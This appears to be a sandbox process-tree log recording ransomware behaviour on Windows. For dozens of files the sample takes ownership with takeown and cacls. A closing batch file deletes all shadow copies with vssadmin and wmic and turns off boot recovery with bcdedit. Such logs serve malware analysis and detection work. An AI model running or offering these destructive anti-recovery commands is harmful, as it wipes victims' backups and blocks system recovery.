    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "utc.tracing.json" -nobanner
    3⤵
    PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "utc.tracing.json" -nobanner
      4⤵
      PID:5784
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:5792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    - Modifies file permissions
    PID:4704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:5916
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:5896
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""
  2⤵
  PID:5228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"
    3⤵
    - Modifies file permissions
    PID:6024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "vedatamodel.edb" -nobanner
    3⤵
    PID:6008
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "vedatamodel.edb" -nobanner
      4⤵
      PID:5928
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"
    3⤵
    - Modifies file permissions
    PID:5300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Data1.cab" -nobanner
    3⤵
    PID:5312
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Data1.cab" -nobanner
      4⤵
      PID:5196
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:5596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:5712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:5808
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:5828
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""
  2⤵
  PID:5580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C
    3⤵
    PID:5860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"
    3⤵
    - Modifies file permissions
    PID:5920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "edb.chk" -nobanner
    3⤵
    PID:4736
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "edb.chk" -nobanner
      4⤵
      PID:5852
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"
    3⤵
    - Modifies file permissions
    PID:5216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "utc.app.json" -nobanner
    3⤵
    PID:5108
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "utc.app.json" -nobanner
      4⤵
      PID:5404
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:5552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:5408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:5760
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""
  2⤵
  PID:5328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"
    3⤵
    - Modifies file permissions
    PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
    3⤵
    PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
      4⤵
      PID:5932
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:6132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    PID:5132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:5164
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:6012
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:5604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:5992
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:4724
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5940
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:5192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:6088
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:5508
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""
  2⤵
  PID:5480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"
    3⤵
    - Modifies file permissions
    PID:5292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "parse.dat" -nobanner
    3⤵
    PID:5652
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "parse.dat" -nobanner
      4⤵
      PID:5892
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""
  2⤵
  PID:4256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"
    3⤵
    - Modifies file permissions
    PID:6128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SmsInterceptStore.jfm" -nobanner
    3⤵
    PID:5232
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SmsInterceptStore.jfm" -nobanner
      4⤵
      PID:6028
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:5664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:5576
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:5496
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:6000
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"
    3⤵
    - Modifies file permissions
    PID:5456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "osver.txt" -nobanner
    3⤵
    PID:5452
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "osver.txt" -nobanner
      4⤵
      PID:5964
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""
  2⤵
  PID:5344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"
    3⤵
    - Modifies file permissions
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "edbres00002.jrs" -nobanner
    3⤵
    PID:5436
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "edbres00002.jrs" -nobanner
      4⤵
      PID:5984
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4896

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\RpTkryrQ.bat"
1⤵
PID:4928
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4292
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4328
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5052
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4696